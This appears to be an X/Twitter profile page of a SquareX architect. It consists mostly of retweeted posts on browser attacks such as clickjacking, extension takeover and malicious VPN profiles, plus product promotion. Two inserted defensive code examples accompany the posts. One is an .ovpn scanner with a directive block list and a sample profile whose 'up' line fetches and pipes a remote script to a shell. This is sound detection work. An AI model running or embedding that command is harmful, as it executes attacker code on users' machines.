Jeswin Mathai

927 posts

@jeswinMathai

Chief Architect, SquareX (@getsquarex)

Joined June 2017
105 Following, 497 Followers
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Some great news! Zscaler @zscaler has acquired SquareX @getsquarex this week: lnkd.in/gRsKRQRw As I reflect on this journey, I keep coming back to the pivotal moments that led to the founding of SquareX — and ultimately to where we are today. One moment stands out above all others: our seed investment from @peakxvpartners (previously Sequoia Capital SEA). I’m deeply thankful and grateful to Shailendra @sjs_day1 and the entire Peak XV team for the trust and belief they showed us at such an early stage. I still vividly remember Jeswin Mathai @jeswinMathai and I sitting in their office, walking through live attack demos in the browser — showing how an adversary could escalate from a browser-based foothold to effectively taking control of an entire computer. What stayed with me wasn’t just the diligence or the questions — it was the twinkle in their eyes. The excitement around how fundamental and interesting this problem was, and the shared belief that if we could solve it natively in the browser, in a ubiquitous way, with just an extension, it could meaningfully change the security landscape. I highly recommend Peak XV to any deep-tech founder. They are an extremely long-term, patient and truly founder-first investor. Throughout our entire collaboration at SquareX, I always felt they backed us in the decisions we made. That kind of unconditional, unwavering support mattered immensely — especially in a domain that changes as fast as security, where innovation is often driven by what attackers are doing next. That trust gave us the creative flexibility to take bold bets, iterate quickly, and stay focused on solving the right problems. I’d also especially like to acknowledge Anandamoy Roychowdhary @smdcmc, Ying Jie Tan, Rajan Anandan (@RajanAnandan), and many others at Peak XV who supported SquareX along the way. Thank you all so much — your guidance and belief made a real difference.
I’m grateful we were able to build this together, and I’m excited to continue watching Peak XV make amazing investments. Thank you 🙏
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Double Clickjacking is the new attack kid on the block - Here's a good article on Forbes by Davey Winder lnkd.in/gmjvup67 This subverts most existing browser-based protections like X-Frame-Options simply because it's a clever UI redressing attack. Also, the attack's simplicity makes it very easy to orchestrate with existing phishing attacks. This attack further underscores the need for a Browser Detection-Response solution that SquareX is pioneering. Rather than trying to build policies for every new attack - we have the capability to apply zero trust principles to each component and action on a page. A Double Clickjacking attack wins by getting the user to double click and approve a privileged action, e.g., giving consent to a 3rd party app for permissions to your company email/storage. By monitoring every such privileged action by default in the browser, including OAuth, SquareX is able to identify and block a Double Clickjacking attack's attempts. Below is a video of a demo with SquareX! Worried about this attack and other browser-based threats? Set up a demo for your enterprise: sqrx.com
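A client-side guard for the privileged button that a double-clickjacking attempt needs the victim to hit (for instance an OAuth consent "Allow" button), as an added example that is not part of the post above and is not SquareX's code. It assumes two things: that a page should only honour a click on such a control after it has itself seen a genuine user gesture (pointer movement or a key press), and that a click arriving within a short time of the window gaining focus is suspect; the 500 ms threshold and the element id `allow` are assumptions for this example. A double-click that starts on an attacker-controlled window and lands on this page as its second click satisfies neither condition.

```javascript
// Added example, not SquareX's code: gate a sensitive button behind evidence
// that the user is really interacting with *this* page. Both checks are
// assumptions chosen for the example; tune them for your application.
function createClickGuard({ minFocusAgeMs = 500 } = {}) {
  let armed = false;      // becomes true once this page sees a real gesture
  let focusedAt = null;   // timestamp of the most recent window focus

  return {
    // Gestures that prove the user is interacting with this document.
    gesture(type) {
      if (type === 'pointermove' || type === 'mousemove' ||
          type === 'keydown' || type === 'touchstart') {
        armed = true;
      }
    },
    // Window focus (e.g. after an attacker window closes) resets the evidence.
    focus(now) { focusedAt = now; armed = false; },
    // Decide whether a click on the sensitive control may proceed.
    click(now) {
      if (!armed) return { allow: false, reason: 'no-gesture' };
      if (focusedAt !== null && now - focusedAt < minFocusAgeMs) {
        return { allow: false, reason: 'too-soon-after-focus' };
      }
      return { allow: true, reason: 'ok' };
    },
  };
}

// Browser wiring; skipped under Node so the module stays runnable there.
if (typeof document !== 'undefined') {
  const guard = createClickGuard();
  const btn = document.getElementById('allow'); // assumed id of the sensitive button
  ['pointermove', 'keydown', 'touchstart'].forEach((t) =>
    document.addEventListener(t, () => guard.gesture(t), { passive: true }));
  window.addEventListener('focus', () => guard.focus(Date.now()));
  if (btn) {
    // Capture phase so the guard runs before the application's own handler.
    btn.addEventListener('click', (e) => {
      const verdict = guard.click(Date.now());
      if (!verdict.allow) {
        e.preventDefault();
        e.stopImmediatePropagation();
      }
    }, true);
  }
}
```

The guard only raises the bar for the click that completes the attack; it does not replace X-Frame-Options or `frame-ancestors`, which still stop classic framing-based clickjacking.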
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Happy New Year everyone! 2025 is a very interesting number: (a) It is the square of the sum of the first nine numbers: (1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9)^2 = 45^2 = 2025 (b) It is the sum of the first 45 odd numbers: 1 + 3 + 5 + 7 + 9 + ... + 87 + 89 = 2025 (c) It's a Harshad/Niven number => divisible by the sum of its digits. For 2025: the sum of its digits is 2 + 0 + 2 + 5 = 9, and indeed 2025 ÷ 9 = 225 (d) It is also the product of two perfect squares: 2025 = 25 x 81 = 5^2 x 9^2 Most importantly, I hope this is a great year for you and for SquareX! :-)
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Really proud moment for the @getsquarex research team - we were the first to discover this attack and publicly disclose and warn Chrome Extension developers. This attack underscores the urgent need for a Browser Detection-Response solution—precisely the innovation SquareX is pioneering. Here is a great article by Forbes on the attack and happy to see us cited: forbes.com/sites/daveywin…
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
The Cyberhaven attack is making headlines—but what could Cyberhaven and its customers have done to prevent it?

Attack Context: lnkd.in/gqZCCDYh

What happened? SquareX reported a large-scale attack targeting Chrome extensions. This is how it worked:
- The Chrome Web Store publicly displays the developer’s email address on the extension’s page.
- Attackers used that email to impersonate the Chrome Web Store and request urgent action.
- By clicking the link in the email, the attackers attempted to gain permission to the developer’s Chrome Extension account.
- The developer may have granted access, enabling the attacker to modify and push a malicious update to the extension.
Here is a video of the actual attack we uncovered: lnkd.in/gHcqJasK

What could have been done to stop this attack?

(A) By Cyberhaven:
(i) Restricting Risky OAuth Permissions. Employees often click through SSO and OAuth screens, potentially granting permissions to unknown third-party apps. On the server side, this could be prevented by disallowing apps that request risky OAuth scopes unless they are authorized. While creating a whitelist isn’t always practical and can reduce productivity, a client-side Browser Detection-Response tool can step in. In the same post linked above, we detail how SquareX could have helped Cyberhaven and other organizations.
(ii) Cyberhaven’s browser extension is primarily deployed in enterprise settings, so there is no strong need to host it on the Google Chrome Web Store. Many security extensions (like Cyberhaven) can be deployed via GPO/MDM, hosted on private URLs/stores. This approach removes the risk of a mass compromise like the one seen in this attack.

(B) By Enterprises using Browser Extensions:
(i) Supply Chain Attack Awareness. Browser extensions installed from the public Chrome Web Store are vulnerable to supply chain attacks. An extension may be malicious from the start, acquired by a malicious party later, or hijacked.
To mitigate these risks, organizations need the ability to detect and block suspicious extensions—either at deployment time or dynamically whenever the extension starts exhibiting malicious behavior. SquareX has extensively researched how extensions can be exploited, including a cutting-edge talk at Defcon and identifying architectural issues in the new MV3 extension framework:
Defcon talk: lnkd.in/gdKWmayt
Darkreading coverage: lnkd.in/gt7-S29v
Our detection capabilities: lnkd.in/gqMTe_tb
If you want to learn more about protecting your enterprise, feel free to DM me or try us at sqrx.com SquareX - an industry-first Browser Detection-Response solution.
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
OMG! We had uncovered and warned about this a week back - the exact attack that Cyberhaven was compromised with - and posted about it here: lnkd.in/g8WTmmW8 Such identity-based attacks can be stopped dead in their tracks with SquareX @getsquarex Feel free to DM me if you need more details and want to protect your organization.
Quoting Vivek Ramachandran @vivekramac (the quoted post appears in full further down this page).
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
QR code attacks are on the rise! These attacks smartly lure enterprise users to use their mobile devices, where generally security is low. This is one of those classic attacks which cannot be solved in the cloud via an intercepting proxy, as this would require analyzing every image passing through, making it unscalable. This is where a browser-native security product can help - sitting in the browser it can quickly analyze only images in user focus and automatically cloak QR codes! SquareX takes this capability to the next level by also allowing enterprises to set rules that isolate links found in QR codes in Remote Browser Isolation, so that users can still do their work but have zero chance of downloading malware. Also, inside SquareX's RBI enterprises can still run all their site and content policies to detect attacks. Like what you hear? Take SquareX for a spin - sqrx.com
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Many enterprise users utilize consumer VPNs, such as OpenVPN. Corporate IT might approve this application because it’s a standard VPN client from a trusted server. However, can an enterprise user be hacked using an OpenVPN script? Many free VPN services provide a simple configuration file (an .ovpn file) that users can just double-click to auto-connect. Interestingly, these .ovpn files can support running arbitrary commands or scripts, allowing an attacker to execute code on a user’s computer. This type of attack is reminiscent of the Midnight Blizzard attack, which uses RDP configuration files to load local drives on remote systems accessible to the attacker. We covered this previously here: x.com/vivekramac/sta… How can your EDR detect this OVPN attack? Unfortunately, it cannot. Most EDRs only offer blanket block/allow settings for file types and do not scan for scripting constructs. What can be done? One way is to prevent the attack “upstream,” in the browser, when the file is downloaded. For example, SquareX can monitor .ovpn files for scripting tokens (such as “Up”) and block these files. Even better, it can copy the file and upload it to the Admin portal for further security analysis. Below is a video demonstration of this attack on a Linux system, although it applies to other platforms as well. More info: sqrx.com
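A download-time check of the kind the post above describes, as an added example that is not part of the post and is not SquareX's code: a scanner for OpenVPN client profiles (.ovpn) that flags the directives able to run an external command or script when the profile connects. The directive names come from the OpenVPN reference manual; note that OpenVPN only runs user-supplied scripts when `script-security` is 2 or higher, which is why the scanner reports that setting too. The two sample profiles are constructed for this example, and the function name `scanOvpn` and the `block`/`allow` verdicts are assumptions.

```javascript
// Added example, not SquareX's code: flag .ovpn profiles that can execute
// commands on the machine importing them. Directive names per the OpenVPN
// manual; everything else here is constructed for the example.

// Directives whose argument is a command or script that OpenVPN executes.
const SCRIPT_DIRECTIVES = new Set([
  'up', 'down', 'route-up', 'route-pre-down', 'ipchange', 'tls-verify',
  'client-connect', 'client-disconnect', 'learn-address',
  'auth-user-pass-verify',
]);

function scanOvpn(text) {
  const findings = [];
  let inlineBlock = null; // inside <ca>...</ca>-style inline data
  const lines = text.split(/\r?\n/);

  lines.forEach((raw, idx) => {
    const line = raw.trim();
    const lineNo = idx + 1;
    if (inlineBlock) {
      // PEM/key material is data, not directives: skip it verbatim.
      if (line === `</${inlineBlock}>`) inlineBlock = null;
      return;
    }
    const open = line.match(/^<([a-z-]+)>$/);
    if (open) { inlineBlock = open[1]; return; }
    if (!line || line.startsWith('#') || line.startsWith(';')) return;

    // Match the directive name at the start of the line (case-insensitive),
    // not as a substring, so words in comments or cert data do not trigger.
    const [directive, ...args] = line.split(/\s+/);
    const name = directive.toLowerCase();
    if (name === 'script-security') {
      const level = parseInt(args[0], 10);
      if (level >= 2) {
        findings.push({ line: lineNo, directive: name,
          detail: `script-security ${level} enables external scripts` });
      }
    } else if (SCRIPT_DIRECTIVES.has(name)) {
      findings.push({ line: lineNo, directive: name, detail: args.join(' ') });
    }
  });

  return { verdict: findings.length ? 'block' : 'allow', findings };
}

// Constructed sample: a profile that runs a shell command on connect.
const SAMPLE_MALICIOUS = [
  'client',
  'dev tun',
  'remote vpn.example.invalid 1194',
  'script-security 2',
  'up "/bin/sh -c \'curl -s http://example.invalid/p | sh\'"',
  '<ca>',
  '-----BEGIN CERTIFICATE-----',
  'MIIB...',
  '-----END CERTIFICATE-----',
  '</ca>',
].join('\n');

// Constructed sample: an ordinary profile with no script directives.
const SAMPLE_BENIGN = [
  'client', 'dev tun', 'remote vpn.example.invalid 1194',
  'remote-cert-tls server', 'auth-user-pass',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanOvpn(SAMPLE_MALICIOUS), null, 2));
  console.log(scanOvpn(SAMPLE_BENIGN).verdict);
}
```

Matching whole directive names at line start, rather than searching the file for the token "up", is what keeps the check from firing on comments, hostnames or certificate bodies while still catching every form OpenVPN would actually execute.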
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Any interesting examples of cyber security ai agents that folks have built?
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Employees have started using SSO as a convenient feature to log in to almost any website that offers a "Login with Microsoft/Google/..." option! Additionally, most SaaS apps provide a "free account to try" option, further encouraging employees to use their company accounts to explore what's behind the curtain. Once an employee logs in, it becomes part of the organization's Shadow SaaS exposure. Often, employees might even use enterprise data to test these unauthorized SaaS apps and then completely forget about them. Even worse, when an employee leaves the company, IT may have no knowledge that enterprise data still exists in those apps. There are several ways to address this issue. A simple approach is to require employees to request an exception when logging into a new SaaS app with their enterprise identity. This ensures IT is aware of why the app is needed and who within the organization is using it. In this video, we demonstrate how this can be implemented via SquareX. Let us know your thoughts, and to test it out, visit sqrx.com
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Can a Chrome Extension be taken over from the Chrome Store with just a few clicks? SquareX has uncovered targeted attacks on Chrome Extension developers aimed at taking over the Chrome extension from the Chrome store - after this the attacker might try to push a malicious modification to the extension and attack its users. Btw variants of these attacks have been used in the past to steal cloud data from Google Drive, OneDrive etc. So how does this attack work? At its core this is an identity attack - the attacker creates a fake "Privacy Policy Application" which tries to connect to the developer's account and gain access to his Chrome store account. We show how SquareX's monitoring capabilities are able to detect this attacker "shadow SaaS" app and how policies can be applied to block these attacks. We've given one example of such a policy but there are many ways our product can help build out attack mitigation for this. It is important to note that as this is an identity attack with its entire life cycle in the browser - standard Remote Browser Isolation cannot detect this. For more information check out Identity attack demos: sqrx.com/usecases/ident…
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
The majority of initial access on an enterprise user's device occurs via the browser — whether through malicious file/script downloads, spearphishing, SSO hijacks, insider threats bypassing DLP, or malicious browser extensions exfiltrating data. The traditional approach is to wait for a file-based attack to drop on the endpoint and hope your EDR detects it, or wait for an enterprise user's identity to be stolen and then rely on an alert when data exfiltration is flagged by your network security or cloud monitoring controls. These are all reactive rather than proactive measures. Today, the browser is rapidly becoming the primary endpoint, with most user workflows taking place within it. Unlike the browsers of the 2010s, which functioned as simple rendering engines, modern browsers have evolved into application platforms in their own right. This shift makes it feasible to develop browser-native and browser-first security solutions. Chrome and Edge offer basic managed hardening policies to start with, and you can eventually advance to a full-fledged Browser Detection and Response solution like SquareX @getsquarex
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
What I hate most about enterprise security product websites: No product demo videos and a lack of information on how the product works. Almost always, there is a need to schedule a call with sales, and this slows down the process. I understand the conventional wisdom that competitors might copy you, but honestly, if that's all it takes for competition to kill you, it's time to evaluate your tech. I ran Pentester Academy for over a decade and firmly believe in "show, not tell." We put out hundreds of videos of our courses and even gave out free sample labs. Buyers were able to sample before they bought, making their decision stronger. When I started SquareX, we did the same. Our website has dozens of videos on every aspect of the product. The main page video is a super long 8-minute one, and deliberately so! We are creating a new category—Browser Detection and Response—and most early adopters are astute tech CISOs and teams who love getting into the gory details before buying. We've had so many great calls where we could focus on second-order things rather than unveil what we are really building, as most websites are just full of marketing-sales speak. Incredibly, our social media grew super fast because of this, getting us close to 20K followers on LinkedIn and similar numbers elsewhere. Funny enough, we see others in overlapping market spaces now doing the same, as they see this is working for us. :-) Overall, this makes our industry better, so we are happy to lead the way.
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
We are looking to hire full time security researchers for SquareX primarily to investigate topics in Browser Security and Client-side Web Attacks.
Requirements: published original research at hacker conferences / written security tools / anything else which demonstrates you love security research. Worldwide location. Competitive pay.
Opportunity to work with a great team which has published some amazing research including:
1. Critical flaws in Webmail attachment scanning: lnkd.in/gvEbRvBy
2. Breaking Secure Web Gateways: lnkd.in/gZsq9nrj
3. Malicious Extensions subverting Mv3: lnkd.in/gt7-S29v
Email us your details: founder sqrx.com or DM me.
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Our Breaking Secure Web Gateways @defcon talk which uncovered over a dozen architectural vulnerabilities in SASE/SSE SWGs is finally up - all vendors continue to remain vulnerable to these attacks: Test your own SASE/SSE: scan.browser.security and browser.security (live attacks) Talk Video: lnkd.in/gX-ipPW2 SquareX @getsquarex is the industry's first Browser Detection Response solution which detects-mitigates-threathunts client-side web attacks on any browser
Jeswin Mathai retweeted
Anandamoy Roychowdhary @smdcmc
So you think your defense posture has you "secure"? Then you won't mind trying this out to see how easily folks can break into your systems :) @vivekramac @getsquarex
Quoting SquareX @getsquarex:
Visitors at the booth are using scan.browser.security to assess their security posture using our tool that simulates real-life attacks and identifies vulnerabilities in their current security stack. Test it for yourself against your existing solutions!
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
I still remember the time when Gmail introduced its Web 2.0 "rich internet application" - everyone was so impressed that new mails would just appear rather than having to hit "refresh" every few minutes on the web page. We've come a long way - web protocols and applications have become increasingly complex, and the Browser itself has become a complex development platform with millions of lines of code, second only to the operating system itself. We cybersecurity folks know that technology complexity always leads to security implications. The less one understands what's happening under the hood, the higher the probability of an adversary lurking around in that darkness. This is exactly what is happening with Web Browsers - very few organizations have visibility into what is happening in this most used enterprise application and even fewer have managed browsers. We started SquareX to solve this exact problem and if you are interested in learning more, then set up a call with me: sqrx.com
Jeswin Mathai retweeted
SquareX @getsquarex
Happy Birthday to our fearless founder @vivekramac 🥳 Here's to another year of breaking barriers, shaking things up, and keeping the browser a safer place for everyone. Thank you for keeping us on our toes, pushing us to the edge of impossible, and making sure we always have a good laugh along the way! Love, The SquareX Team💖 P.S. We totally didn't write Vivek a love poem 😉
Jeswin Mathai retweeted
Vivek Ramachandran @vivekramac
Secure Web Gateways (SWG) as part of SASE/SSE are unfortunately becoming dated tech when it comes to detecting client-side Web Attacks happening on an employee's browser. If you are a Pentester/Red Teamer/Security Researcher check out browser.security and test your company/client's SASE/SSE SWG security - all vendors in the Gartner quadrants fail these as they are architectural vulnerabilities. What could be most surprising to most enterprises deploying SASE/SSE is that many important communication channels are not even monitored today, e.g. WebSockets, WebRTC, WebTransport, gRPC, Server-Sent Events, WebTorrent, Firebase Cloud Messaging etc., allowing attackers to fully bypass the monitoring and smuggle malicious files. This is just ONE of the vulnerabilities we discussed in our DEFCON main stage talk! Try SquareX to see how you can protect your enterprise or get us to do a FREE security evaluation for you: sqrx.com @getsquarex